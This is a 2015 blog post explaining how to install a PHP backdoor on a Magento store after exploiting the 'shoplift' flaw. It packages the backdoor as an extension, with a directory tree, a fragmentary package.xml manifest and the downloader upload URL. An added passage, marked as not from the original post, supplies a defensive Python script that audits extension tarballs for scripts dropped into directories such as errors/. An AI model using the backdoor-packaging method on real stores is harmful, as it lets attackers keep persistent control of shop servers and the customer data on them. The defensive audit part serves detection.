Artificial truth

The more you see, the less you believe.

Writing a simple extension/backdoor for Magento
Sun 15 November 2015

I was exploiting the shoplift vulnerability on a Magento instance, and I was looking for a practical (as in easy and clean) way to get a shell. Of course, I could have chained CVE-2015-1398 and CVE-2015-1399 like Check Point did, but I was way too lazy.

Instead, I decided to write an extension module and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a simple fucking extension with a single stupid PHP file, here is a quick how-to:

I didn't want to read the URL-rewriting code of Magento, so I decided that my backdoor would live under the errors folder.

Write (or get) a PHP backdoor and put it into an errors folder, create a package.xml file like the one below, then put everything into a tar.gz file, like this:

$ tree 
├── errors
│   └── backdoor.php
└── package.xml

That's it: you have your module. You can now upload it at http://yourmagentoinstan.ce/downloader, and access your backdoor at http://yourmagentoinstan.ce/errors/backdoor.php.

<?xml version="1.0"?>
<summary>Backdoor for magento</summary>
<description>Backdoor for magento</description>
    <target name="mage">
            <dir name="errors">
                <file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/>

The hash attribute is the MD5 sum of your file (here, backdoor.php).
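Seen from the defending side, a package like this is just a tarball unpacked over the web root, so it can be inspected before anyone installs it through the downloader. The following is an added example, not code from the original post: it lists script files a package would drop into directories such as errors/ and reports their MD5, the same digest package.xml records. SUSPECT_DIRS, the function names and the sample package (with its hypothetical Acme_Demo module) are assumptions made for the illustration.

```python
import hashlib
import io
import tarfile
from pathlib import PurePosixPath

# Assumption: web-root directories a legitimate extension has no reason to
# drop server-side scripts into. Tune this list for your own deployment.
SUSPECT_DIRS = {"errors", "media", "var", "skin", "js"}
SCRIPT_EXTS = {".php", ".php5", ".phtml", ".phar"}
SAMPLE_BODY = b"<?php // inert placeholder, constructed for this example\n"


def audit_package(fileobj):
    """Return [(path, md5)] for script files the package writes into SUSPECT_DIRS."""
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            # PurePosixPath drops "./" prefixes; also ignore a leading "/"
            parts = [p for p in PurePosixPath(member.name).parts if p != "/"]
            if (len(parts) > 1 and parts[0] in SUSPECT_DIRS
                    and PurePosixPath(parts[-1]).suffix.lower() in SCRIPT_EXTS):
                data = tar.extractfile(member).read()
                # package.xml stores an MD5 per file, so report the same digest
                findings.append(("/".join(parts), hashlib.md5(data).hexdigest()))
    return findings


def build_sample():
    """Constructed sample: one inert script under errors/, one ordinary module file."""
    members = {
        "package.xml": b"<package/>",
        "errors/sample.php": SAMPLE_BODY,
        "app/code/community/Acme/Demo/Helper/Data.php": SAMPLE_BODY,
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for path, digest in audit_package(build_sample()):
        print(f"SUSPECT {digest}  {path}")
```

The same path and extension test can be run over an installed tree to spot scripts that are not part of the stock errors/ directory.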